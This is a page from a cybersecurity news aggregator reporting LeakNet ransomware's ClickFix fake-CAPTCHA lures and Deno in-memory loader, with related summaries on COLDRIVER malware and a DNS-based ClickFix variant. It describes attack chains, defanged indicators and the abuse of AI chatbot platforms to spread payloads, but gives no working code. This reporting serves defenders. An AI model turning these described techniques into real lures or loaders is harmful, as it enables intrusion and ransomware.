CyberHappenings logo
Home Browse Watchlists Experimental About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

LeakNet ransomware expands operations with ClickFix social engineering and Deno-based in-memory execution

First reported
Last updated
2 unique sources, 2 articles

Summary

Hide ▲

LeakNet ransomware has expanded its operations by adopting the ClickFix social engineering tactic delivered through compromised websites, which instruct users to run malicious 'msiexec.exe' commands via fake CAPTCHA checks. The group continues to deploy a Deno-based in-memory loader to execute Base64-encoded JavaScript payloads, fingerprint systems, and stage follow-on malware via polling loops, while maintaining a consistent post-exploitation chain involving DLL sideloading, credential discovery via 'klist', lateral movement via PsExec, and data staging using compromised Amazon S3 buckets. LeakNet first emerged in November 2024, presenting itself as a 'digital watchdog' focused on internet freedom and transparency, and has targeted industrial entities according to Dragos. The group’s shift away from initial access brokers reduces per-victim costs and operational bottlenecks. ReliaQuest also observed a separate intrusion attempt using Microsoft Teams-based phishing leading to a Deno-based loader, suggesting either a broadening of LeakNet’s tactics or adoption by other actors. The operation’s average of three monthly victims may increase as the group scales its new initial access and execution methods.

Timeline

  1. 17.03.2026 14:09 2 articles · 3h ago

    LeakNet ransomware leverages ClickFix and Deno runtime for stealthy, in-memory attacks

    New details clarify the ClickFix delivery mechanism via compromised legitimate websites serving fake CAPTCHA verification checks that instruct users to copy and paste malicious 'msiexec.exe' commands into the Windows Run dialog. The Deno-based loader now includes Base64-encoded JavaScript execution in memory, system fingerprinting, and a polling loop to repeatedly fetch and execute additional stages via Deno. A separate intrusion attempt using Microsoft Teams-based phishing to socially engineer a user into launching a payload chain ending in a Deno-based loader was observed, suggesting a potential broadening of initial access vectors either for LeakNet or other actors. LeakNet’s post-exploitation remains consistent: credential discovery via 'klist', DLL sideloading (jli.dll), lateral movement via PsExec, and data staging/exfiltration using compromised Amazon S3 buckets. The group first emerged in November 2024, presenting itself as a 'digital watchdog,' and has targeted industrial entities according to Dragos data. The shift away from initial access brokers reduces dependence on third-party suppliers and lowers per-victim acquisition costs.

    Show sources
    Open in new tab

Information Snippets

Similar Happenings

AI-Enabled Supply Chain Attacks Surge 156% in 2024

AI-enabled supply chain attacks have surged 156% in the past year, with sophisticated malware exhibiting polymorphic, context-aware, and semantically camouflaged characteristics. Real-world attacks, such as the 3CX breach affecting 600,000 companies and the NullBulge Group's weaponization of Hugging Face and GitHub repositories, highlight the increasing threat. Traditional security tools struggle against these adaptive threats, necessitating new defensive strategies and regulatory compliance measures. The EU AI Act imposes stringent penalties for violations, emphasizing the need for organizations to adopt AI-aware security measures and implement immediate action plans to mitigate risks.

Open in new tab

COLDRIVER APT Group Uses ClickFix Tactics to Deliver BAITSWITCH and SIMPLEFIX Malware

The COLDRIVER APT group, also known as Star Blizzard, has intensified its operations since May 2025, rapidly developing and refining its malware arsenal. The group has launched a new campaign using ClickFix tactics to deliver three new malware families: NOROBOT, YESROBOT, and MAYBEROBOT. These malware families are connected via a delivery chain and target individuals and organizations connected to Russia, including NGOs, human rights defenders, and think tanks. The attack chain involves tricking victims into running a malicious DLL via a fake CAPTCHA check, leading to the deployment of the SIMPLEFIX backdoor. The malware exfiltrates specific file types and establishes communication with a command-and-control server. The campaign aligns with COLDRIVER's known victimology, focusing on civil society members connected to Russia. The group has been active since 2019, using spear-phishing and custom tools like SPICA and LOSTKEYS. The latest campaign demonstrates the group's continued use of effective infection vectors, despite their lack of technical sophistication. The malware families NOROBOT and MAYBEROBOT are tracked by Zscaler ThreatLabz under the names BAITSWITCH and SIMPLEFIX, respectively. The COLDRIVER group has been deploying the new malware set more aggressively than any previous campaigns. The new malware set replaces the previous primary malware LOSTKEYS, which has not been observed since its public disclosure in May 2025. The attack starts with a 'ClickFix-style' phishing lure, a fake CAPTCHA page designed to trick the victim into thinking they must verify they’re 'not a robot'. The malware uses a split-key cryptography scheme, with parts of the decryption key hidden in downloaded files and the Windows Registry. The malware fetches a self-extracting Python 3.8 installer, two encrypted Python scripts, and a scheduled task to ensure persistence. The Python scripts are combined to decrypt and launch a minimal Python-based first-stage backdoor that communicates with a hardcoded command-and-control (C2) server. The COLDRIVER group abandoned YESROBOT after just two weeks due to its cumbersome and easily detectable nature. The COLDRIVER group switched to MAYBEROBOT, a more flexible PowerShell-based backdoor, around June 2025. MAYBEROBOT uses a custom C2 protocol with commands to download and execute files, run commands via cmd.exe, and execute PowerShell blocks. The COLDRIVER group has been constantly evolving the NOROBOT malware to evade detection systems. The group has been using the NOROBOT and MAYBEROBOT malware families on targets previously compromised through phishing to acquire additional intelligence value from information on their devices directly. The PhantomCaptcha campaign targeted Ukrainian regional government administration and organizations critical for the war relief effort, including the International Committee of the Red Cross, UNICEF, and various NGOs. The campaign began on October 8, 2025, and used a malicious "I am not a robot" CAPTCHA challenge to execute a PowerShell command, installing malware on victims' systems. The malware operated in three stages: a downloader script, a reconnaissance module, and a WebSocket-based RAT. The campaign's infrastructure was active for just one day, with backend servers remaining online to manage infected devices. The PhantomCaptcha campaign is linked to a wider operation involving malicious Android apps disguised as adult entertainment or cloud storage services. The latest incidents were reported in May and June 2025 by two organizations, including Reporters Without Borders (RSF). The group is known for impersonating trusted contacts and prompting targets to request missing or malfunctioning attachments. In one case involving RSF in March 2025, a ProtonMail address mimicking a legitimate contact sent a French-language email asking a core member to review a document. No file was attached. When the member requested it, the operators replied in English with a link routed through a compromised website to a ProtonDrive URL. However, the file itself could not be retrieved because ProtonMail had blocked the associated account. A second victim received a file labeled as a PDF that was actually a ZIP archive disguised with a .pdf extension. The final stage of the attack used a typical Calisto decoy PDF that claimed to be encrypted and instructed the user to open it in ProtonDrive. The link again sent the target through a redirector hosted on a compromised website. The phishing kit analyzed by TDR, located on account.simpleasip[.]org, appeared to be custom built. It targeted ProtonMail accounts using an Adversary-in-the-Middle (AiTM) setup that relays two-factor authentication (2FA). Analysts found injected JavaScript designed to keep the cursor locked to the password field and to interact with an attacker-controlled API for handling CAPTCHA and 2FA prompts. Star Blizzard's infrastructure included servers hosting phishing pages and others serving as API endpoints. Many domains were tied to Namecheap services, while some earlier ones were registered via Regway to help analysts track the cluster over time.

Open in new tab

UNC5518 Access-as-a-Service Campaign via ClickFix and Fake CAPTCHA Pages

Microsoft and Malwarebytes have disclosed a **DNS-based ClickFix variant** that marks the first documented use of the `nslookup` command to stage and deliver malicious payloads. This technique abuses DNS queries to retrieve a PowerShell script embedded in the `NAME:` field of a DNS response from an attacker-controlled server (**84[.]21.189[.]20**), which then deploys **ModeloRAT** via a Python runtime and VBScript persistence mechanism. The attack chain begins with fake CAPTCHA lures, followed by social engineering tactics (e.g., fake system alerts, browser crashes, or instructional videos) to coerce victims into executing the `nslookup` command, which downloads a ZIP archive containing the final payload. This evolution builds on earlier ClickFix tactics, including **ConsentFix** (Azure CLI OAuth abuse), **CrashFix** (malicious Chrome extensions triggering browser crashes), and **SyncAppvPublishingServer.vbs** (Google Calendar dead drops). The latest DNS-based approach demonstrates the campaign’s adaptability, leveraging **trusted native tools** (`nslookup`), **DNS as a C2 channel**, and **psychological manipulation** (urgency tactics) to bypass security controls. Concurrently, ClickFix campaigns continue to expand with **cross-platform targeting** (Windows/Linux/macOS), **AI platform abuse** (ChatGPT, Grok, Claude), and **weaponized SaaS infrastructure** (Google Groups, Pastebin) to distribute payloads like **Lumma Stealer** and **Odyssey Stealer**. The integration of **DNS staging**, **browser-native execution**, and **multi-stage loaders** underscores the campaign’s resilience despite 2025 law enforcement disruptions, with actors refining tradecraft to maximize evasion via **social engineering**, **steganography**, and **legitimate service abuse**.

Open in new tab